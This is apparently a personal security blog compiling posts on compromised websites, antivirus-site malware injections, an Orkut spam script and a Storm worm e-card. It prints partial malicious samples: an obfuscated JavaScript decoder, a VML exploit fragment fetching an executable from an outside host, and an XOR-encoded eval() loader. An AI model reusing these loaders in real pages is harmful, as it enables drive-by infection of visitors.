K’LL3r

There are some reports in the media that Antivirus Company TrendMicro website hacked and spreading malware .In short you can read that information  here,  here, and here also

According to Sophos coverage,  their website got injected on 9th March but i got a Google Cache page of infected TrendMicro Japanese page as on 6th March. It means their website was injected with script before 9th March.

Why attackers used the name of the script as “FUCKJP.JS”  ? You all know what stands for JP

Also I searched for the same script in Google  & found around 13000  injected pages of legtimate websites mainly in INDIA  also NIC.IN !!

After Analyzing the script I remembered that these kind of scripts are created by using some Web attckers  toolkit like MPack, FirePack, IcePack , WPack or AnnyPack in which just you have to feed some info like payload and place it to compromised webserver or newone. But in this case the it is VIP 2.74 from Chinese Hackers. Latest Version is 2.842. 

Other Information about the malware you can find yourself :).  Just see below the screenshots…

Yesterday someone reported that malicious javascript is circulating in the wild which results lots of spam to the Orkut users for the Innobuzz courses details.I contacted to the author of  blog  and he gave me shocking reply what he got.

“This is Rohit. Im the person responsible for developing the Orkut script  ( Anybody who wants to sue this is the buddy) which you are taking about.

First let me tell you that I would have done the same as what you have done if I were in your shoes but our company has not at all created this script. The script which we created is available here:  Website_name .This was circulated in closed environment within a few friends to show how orkut can be used for spamming purposes. (It means Innobuzz is  teaching how to spam through Orkut!! Under US Law to teach like that is illegal and subjected to punishment) However, it seems that someone has made a copy of the script, changed the title to something which appeals to everyone and let it free on orkut.”

That’s hilaroius!! Through out my past six years of  experience in Information Security and Cyber Law this is first and foremost important fact ” Security concern through internal threats within company”. There are lots of papers out on internet for protecting company  environment through internal threats. This is also one example of that if is it so. According to Rohit Sharma of InnoBuzz , that script was just a demo  in their internal and limited environment and somebody copied and circulated resulting spam DDOS of their website. Is it legal to  present  demo with Live social networking website “Orkut” and where is the limitation?
That’s more worst, they are teaching “Ethical hacking” like courses and they don’t know how to give demo? I am of opinion that they did intentionally for advertisement anyway here you can find more info about that script.

UPDATE: “Finally, Google has closed the website and the script” - Rohit Sharma
                       Close the Company as well  !!!!!

It’s again “VIRUT”

This time Pune(INDIA) based antivirus company is serving the antivirus which itself is infected with “Virut” virus.

Read more Info at:  Here

UPDATE(08/02): Malicious IFRAME has been removed . So Web-admins  should have knowledge of all various method of attacks  and keep update & audit their site/server.

What do you think if an antivirus company’s website itself infecting the users? Well that’s the most alarming situation about web-security and problem of surfing suppose-to-be trusted website. 
The same happened to Delhi (India) based  AVsoft Technologies’s antivirus website http://www.s-cop.com.
Their product “SmartCop Antivirus” is capable to detect malwares!

Infection is carried by exploiting common vulnerabilites using encrypted script. In this case it is like

<script language=JavaScript>function dc(x){var l=x.length,b=1024,i,j,r,p=0,s=0,w=0,t=Array(63,37,11,46,55,34,16,14,60,58,0,0,0,0,0,0,18,24,29,45,6,38,48,41,61,50,33,17);for(j=Math.ceil(l/b);j>0;j–){r=”;for(i=Math.min(l,b);i>0;i–,l–){w|=(t[x.charCodeAt(p++)-48])<<s;if(s){r+=String.fromCharCode(165^w&255);w>>=8;s-=2}else{s=6}}document.write(r)}}dc(”gPjEXVXIadA4ie8IN0zSARiSdT8eNqcLfhpMNhiIpq8vnqCIoVX5DypIW……….

which decryptes to

<html xmlns:v=”urn:schemas-microsoft-com:vml”><head>
<object id=”VMLRender” classid=”CLSID:10072CEC-8CC1-11D1-986E-00A0C955B42E”>
</object>
<style>
v\:* { behavior: url(#VMLRender); }
</style>
</head>
<body><div id=”myDivA”></div> 
<script language=”JavaScript”>  
 function bxdbSGIA(Z0gP3oql, Bwpp5g4P)
 {
  while (Z0gP3oql.length*2<Bwpp5g4P)  ….

function Attack(n)
 {…
‘<param name=”src” value=” http://ntkrnlpa[dot]info/rc/exe[dot]
………
Just see the screenshots below…

This all is used by the infamous (underground networks!!) tool “IcePack” . You can see below the admin console

Already reported to concerned authorities.

There has been sharp rise in Phising banking related  sites , specially targeting small nation banks.This year started with hacking of indian bank sites. but still there is no awarness in Security & disclosing of personal details.

This time HDFC bank practising weak security policy by  publishing the personal datails(email address) over their main site, still long way to go in learning security from past.

Hope HDFC Bank will take down this information, inspite of this  they have some good security features like login with  virtual keyboard to fight against keyloggers but otherside there are very smart malwares too

I was looking around the websites of Indian banks like ICICI Bank, SBI, HDFC Bank and stick to HDFC Bank website after getting the EMAILS of the its customers…

Evgeny Legerov published a vulnerability for the RealPlayer which can be used to execute code on vulnerable computers.

Right now there is no patch available for this.

For more information check

http://www.frsirt.com/english/advisories/2008/0016

http://secunia.com/advisories/28276/

http://gleg.net/realplayer11.html

Now there is already malicious script for the RealPlayer and to be surprise there are lots of website having the code to execute  that script. See the below screenshot

 uc8010.com and ucmal.com 

on 2nd Nov 2007, SophosLabs UK blog  uncovered a new web attack “An iframe alternative”. They have given the image but malware link is not so clear…so i did a little experiment, just changed the resolution, color depth and finally you know ..just have a look WARNING:DON’T VISIT THE LINK, IT IS MALWARE.
Original Image

Now look at

I think much better

Now verification with ‘Google’ !!!

While searching on GOOGLE I found that Delhi University Website having some pages which redirects to

porn links. See below images……

UPDATE(5/11): After reporting to webmaster, now it has been removed…. quick response

This time ecard  aka  storm worm variant defined two function in the encoded java script. Just see the encoded Java Script..

“To view your ecard, you need to have Microsoft Data Access installed on your computer.<br> To obtain a free copy of Microsoft Data Access, please <a href=”/msdataaccess.exe”>click here</a>.<div id=”mydiv”></div><Script Language=’JavaScript’> function xor_str(plain_str, xor_key){ var xored_str = “”; for (var i = 0 ; i < plain_str.length; ++i) xored_str += String.fromCharCode(xor_key ^ plain_str.charCodeAt(i)); return xored_str; } function kaspersky(suck,dick){}; function kaspersky2(suck_dick,again){};var plain_str = “\x7d\x50\x57\x50\x57\x2b\x3c\x2f\x7d\x30\x30\x7d\x60\x7d\x33\x38\x2a\x7d\x1c\x2f\x2f\x3c\x24\x75\x74\x66\x50\x57\x2b\x3c\x2f\x7d\x30\x38\x30\x02\x3b\x31\x3c\x3a\x7d\x60\x7d\x6d\x66\x50\x57\x50\x57\x57\x50\x57\x50\x57\x2e\x29\x3c\x2f\x29\x75\x74\x66\x50\x57\x50\x57″; var xored_str = xor_str(plain_str, 93); eval(xored_str); </script>

Awesome conferences!! They’ll take time to upload the slides, meanwhile if you want to download their slides just check here

BlackHat USA’07

http://www.hotsecuritynews.com/bh-usa-07/             

Defcon-15

http://www.freelanceresearch.org/DEFCON_15.iso

http://bzimage.spymac.net/DEFCON_15.iso

http://garaged.homeip.net/DEFCON15/